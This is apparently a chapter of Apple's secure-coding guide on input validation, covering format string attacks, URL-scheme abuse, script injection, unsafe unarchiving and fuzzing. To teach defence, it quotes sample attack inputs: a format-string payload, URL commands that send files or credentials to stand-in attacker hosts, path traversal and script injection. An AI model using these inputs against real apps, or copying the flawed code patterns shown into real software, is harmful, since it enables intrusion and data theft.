< Previous PageNext Page >

Hide TOC

Validating Input

A major, and growing, source of security vulnerabilities is the failure of programs to validate all input from outside the program—that is, data provided by users or by other processes. This article describes some of the ways in which unvalidated input can be exploited, and some coding techniques to practice and to avoid.

Risks of Unvalidated Input

Any time your program accepts input from an uncontrolled source, there is a potential for a user to pass in data that does not conform to your expectations. If you don’t validate the input, it might cause problems ranging from program crashes to allowing an attacker to execute his own code. There are a number of ways an attacker can take advantage of unvalidated input, including through:

Buffer overflows
Format string vulnerabilities
URL commands
Code insertion
Social engineering

Many Apple security updates have been to fix input vulnerabilities, including a couple of vulnerabilities that hackers used to “jailbreak” iPhones. Input vulnerabilities are common, often easily exploitable, but also usually easily remedied.

Causing a Buffer Overflow

If a user can input data and you don’t check its size and truncate it appropriately, an attacker can use the input field to cause a buffer overflow. For example, if you ask a user to input the name of an existing file, you might reserve a buffer of 256 bytes for the filename, with the expectation that they could not have a file with a longer name than that. However, if you don’t check the length of the string the user actually passes to you, some hacker is sure to try a longer string than that, resulting in a buffer overflow. Once they’ve established that they can cause a buffer overflow, they’ll attempt to craft a long input for the field that results in an exploit of some sort (see “Avoiding Buffer Overflows”). Simply using the wrong string function to handle an input string can have the same result (see “String Handling”).

Format String Attacks

If you are taking input from a user or other untrusted source and displaying it, you need to be careful that your display routines do not process format strings received from the untrusted source. For example, in the following code the syslog standard C library function is used to write a received HTTP request to the system log. Because the syslog function processes format strings, it will process any format strings included in the input packet:

/* receiving http packet */

int size = recv(fd, pktBuf, sizeof(pktBuf), 0);

if (size) {

syslog(LOG_INFO, "Received new HTTP request!");

syslog(LOG_INFO, pktBuf);

Many format strings can cause problems for applications. For example, suppose an attacker passes the following string in the input packet:

"AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n"

Assuming that the format string itself is stored on the stack, this string retrieves eight items from the stack. Depending on the nature of the stack and memory used by the device, this might effectively moving the stack pointer back to the beginning of the format string. Then the %n token could cause the print function to write the formatted bytes to the memory location AAAA, or 0x41414141. That in itself will cause a crash the next time the system has to access that memory location. By using a string carefully crafted for a specific device and operating system, the attacker can write arbitrary data to any location. See the manual page for printf(3) for a full description of format string syntax.

To prevent format string attacks, it is only necessary to make sure that no print function call that accepts input from an untrusted source processes format strings in the input data. To do so, you need to include your own format string in each such function call. For example, the call

printf(buffer)

may be subject to attack, but the call

printf("%s", buffer)

is not. In the second case, all characters in the buffer parameter—including percent signs (%)—are printed out rather than being interpreted as formatting tokens.

This situation can be made more complicated when a string is accidentally formatted more than once. In the following example, the informativeTextWithFormat argument of the NSAlert method alertWithMessageText:defaultButton:alternateButton:otherButton:informativeTextWithFormat: calls the NSString method stringWithFormat:GetLocalizedString rather than simply formatting the message string itself. As a result, the string is formatted twice, and the data from the imported certificate is used as part of the format string for the NSAlert method:

alert = [NSAlert alertWithMessageText:"Certificate Import Succeeded"

defaultButton:"OK"

alternateButton:nil

otherButton:nil

informativeTextWithFormat:[NSString stringWithFormat:

       "The imported certificate \"%@\" has been selected in the certificate pop-up.",

       [selectedCert identifier]]];

[alert setAlertStyle:NSInformationalAlertStyle];

[alert runModal];

Instead, the string should be formatted only once, as follows:

informativeTextWithFormat:"The imported certificate \"%@\" has been selected in the certificate pop-up.",

       [selectedCert identifier]]];

The following commonly-used functions and methods are subject to format-string attacks:

Standard C
- printf and other functions listed on the printf(3) manual page
- scanf and other functions listed on the scanf(3) manual page
- syslog and vsyslog
Carbon
- CFStringCreateWithFormat
- CFStringCreateWithFormatAndArguments
- CFStringAppendFormat
- AEBuildDesc
- AEBuildParameters
- AEBuildAppleEvent
Cocoa
- [NSString stringWithFormat:] and other NSString methods that take formatted strings as arguments
- [NSString initWithFormat:] and other NSString methods that take format strings as arguments
- [NSMutableString appendFormat:]
- [NSAlert alertWithMessageText:defaultButton:alternateButton:otherButton:informativeTextWithFormat:]
- [NSPredicate predicateWithFormat:] and [NSPredicate predicateWithFormat:arguments:]
- [NSException raise:format:] and [NSException raise:format:arguments:]
- NSRunAlertPanel and other Application Kit functions that create or return panels or sheets

URL Commands

If your application has registered a URL scheme, you have to be careful about how you process commands sent to your application through the URL string. Whether you make the commands public or not, hackers will try sending commands to your application. If, for example, you provide a link or links to launch your application from your web site, hackers will look to see what commands you’re sending and will try every variation on those commands they can think of. You must be prepared to handle, or to filter out, any commands that can be sent to your application, not only those commands that you would like to receive. For example, if you accept a command that causes your application to send credentials back to your web server, don’t make the function handler general enough so that an attacker can substitute the URL of their own web server. Here are some examples of the sorts of commands that you should not accept:

myapp://cmd/run?program=/path/to/program/to/run
myapp://cmd/set_preference?use_ssl=false
myapp://cmd/sendfile?to=evil@attacker.com&file=some/data/file
myapp://cmd/delete?data_to_delete=my_document_ive_been_working_on
myapp://cmd/login_to?server_to_send_credentials=some.malicious.webserver.com

In general, don’t accept commands that include arbitrary URLs or complete pathnames.

If you accept text or other data in a URL command that you subsequently include in a function or method call, you could be subject to a format string attack (see “Format String Attacks”) or a buffer overflow attack (see “Causing a Buffer Overflow”). If you accept pathnames, be careful to guard against strings that might redirect a call to another directory; for example:

myapp://use_template?template=/../../../../../../../../some/other/file

Code Insertion

Unvalidated URL commands and text strings sometimes allow an attacker to insert code into a program, which the program then executes. For example, if your application processes HTML and Javascript when displaying text, and displays strings received through a URL command, an attacker could send a command something like this:

myapp://cmd/adduser='>"><script>javascript to run goes here</script>

Similarly, HTML and other scripting languages can be inserted through URLs, text fields, and other data inputs, such as command lines and even graphics or audio files. You should either not execute scripts in data from an untrusted source, or you should validate all such data to make sure it conforms to your expectations for input. Never assume that the data you receive is well formed and valid; hackers and malicious users will try every sort of malformed data they can think of to see what effect it has on your program.

Social Engineering

Social engineering—essentially tricking the user—can be used with unvalidated input vulnerabilities to turn a minor annoyance into a major problem. For example, if your program accepts a URL command to delete a file, but first displays a dialog requesting permission from the user, you might be able to send a long-enough string to scroll the name of the file to be deleted past the end of the dialog. You could trick the user into thinking he was deleting something innocuous, such as unneeded cached data. For example:

myapp://cmd/delete?file=cached data that is slowing down your system.,realfile

The user then might see a dialog with the text “Are you sure you want to delete cached data that is slowing down your system.” The name of the real file, in this scenario, is out of sight below the bottom of the dialog window. When the user clicks the “OK” button, however, the user’s real data is deleted.

Other examples of social engineering attacks include tricking a user into clicking on a link in a malicious web site or following a malicious URL.

Archived Data

Archiving data refers to converting objects and values into an architecture-independent stream of bytes that preserves the identity of and the relationships between the objects and values. Archives are used for writing data to a file, transmitting data between processes or across a network, or performing other types of data storage or exchange. Archiving is described briefly in this section in order to explain the security concerns associated with the process of reading archived data. For details about archiving, see Archives and Serializations Programming Guide for Cocoa.

Archiving and Unarchiving Data In Mac OS X

In Cocoa, you use a coder object to create and read from an archive, where a coder object is an instance of a concrete subclass of the abstract class NSCoder. NSCoder declares an extensive interface for taking the information stored in an object and putting it into a format suitable for archiving. NSCoder also declares the interface for reversing the process, taking the information stored in a byte stream and converting it back into an object.

Mac OS X provides several concrete subclasses of NSCoder for developers’ use. Most commonly used are NSKeyedArchiver and NSKeyedUnarchiver. The easiest way to use these classes is to call a convenience class method that instantiates the class and initializes the coder object for you, such as archivedDataWithRootObject: or unarchiveObjectWithData:. The coder then sends an encodeWithCoder: message to your object if it’s creating an archive or an initWithCoder: message if it’s reading an archive. You are responsible for implementing these methods—which do the actual encoding or decoding of your object’s instance variables—for each object that supports archiving. The NSKeyedArchiver and NSKeyedUnarchiver classes implement methods that your encodeWithCoder: and initWithCoder: methods can call to code or decode values.

For example, suppose you have a data object called myData and you want to archive the data in that object. Your myData object would have to implement the encodeWithCoder: method to encode the instance variables in the myData object. A typical execution sequence would proceed like this:

Your application calls the archivedDataWithRootObject: method, passing it a pointer to your myData object.
The archivedDataWithRootObject: method initiates and initializes an NSKeyedArchiver object, which sends an encodeWithCoder: message to your myData object. The encodeWithCoder: message includes a pointer to the NSKeyedArchiver object that sent the message.
Your myData object executes its encodeWithCoder: method.
The encodeWithCoder: method encodes the instance variables of your myData object by calling methods provided by the NSKeyedArchiver object—for example, encodeObject:forKey: or encodeFloat:forKey:.
When your encodeWithCoder: method is finished encoding your object’s data, it returns control to the archivedDataWithRootObject: method.
The archivedDataWithRootObject: method completes, returning to your application a pointer to the archived data.

To unarchive the data, your application follows essentially the same steps, except that you call the unarchiveObjectWithData: method, which calls your data object’s initWithCoder: method. For code samples illustrating these steps, see Archives and Serializations Programming Guide for Cocoa and the iSpend sample application.

The Security Risks In Unarchiving Data

Archived data can be stored in memory or in a file on disk. Because an application must know the type of data stored in an archive in order to unarchive it, developers typically assume that the values being decoded are the same size and data type as the values they originally coded. However, when the data is stored in an insecure manner before being unarchived, this is not a safe assumption. If the archived data is not stored securely, it is possible for an attacker to modify the data before the application unarchives it. If your initWithCoder: method does not carefully validate all the data it’s decoding to make sure it is well formed and does not exceed the memory space reserved for it, then by carefully crafting a corrupted archive, an attacker can cause a buffer overflow or trigger another vulnerability and possibly seize control of the system. In addition, some objects return a different object during unarchiving (see the NSKeyedUnarchiver method unarchiver:didDecodeObject:) or when they receive the message awakeAfterUsingCoder:. NSImage is one example of such a class—it may register itself for a name when unarchived, potentially taking the place of an image the application uses. An attacker might be able to take advantage of this to insert a maliciously corrupt image file into an application.

It’s worth keeping in mind that, even if you write completely safe code, there might still be security vulnerabilities in libraries called by your code. Specifically, the initWithCoder: methods of the superclasses of your classes are also involved in unarchiving. Therefore, to be completely sure of the safety of unarchived data, you should be careful to store the data in a secure location.

Note that nib files are archives, and these cautions apply equally to them. A nib file loaded from a signed application bundle should be trustable, but a nib file stored in an insecure location is not.

See “Risks of Unvalidated Input” for more information on the risks of reading unvalidated input, “Secure File Operations” for techniques you can use to keep your archive files secure, and the other sections in this chapter for details on validating input.

Fuzzing

Fuzzing, or fuzz testing, is the technique of passing random data to a program input to see what happens. If the program crashes or otherwise misbehaves, that’s an indication of a potential vulnerability that might be exploitable. Fuzzing is a favorite tool of hackers who are looking for buffer overflows and the other types of vulnerabilities discussed in this article. Because it will be employed by hackers against your program, you should use it first, so you can close any vulnerabilities before they do. Although you can never prove that your program is completely free of vulnerabilities, you can at least get rid of any that are easy to find this way. In this case, the developer’s job is much easier than that of the hacker. Whereas the hacker has to not only find input fields that might be vulnerable, but also must determine the exact nature of the vulnerability and then craft an attack that exploits it, you need only find the vulnerability, then look at the source code to determine how to close it. You don’t need to prove that the problem is exploitable—just assume that someone will find a way to exploit it, and fix it before they get an opportunity to try.

Fuzzing is best done with scripts or short programs that randomly vary the input passed to a program. Depending on the type of input you’re testing—text field, URL, data file, and so forth—you can try HTML, javascript, extra long strings, normally illegal characters, and so forth. If the program crashes or does anything unexpected, you need to examine the source code that handles that input to see what the problem is, and fix it.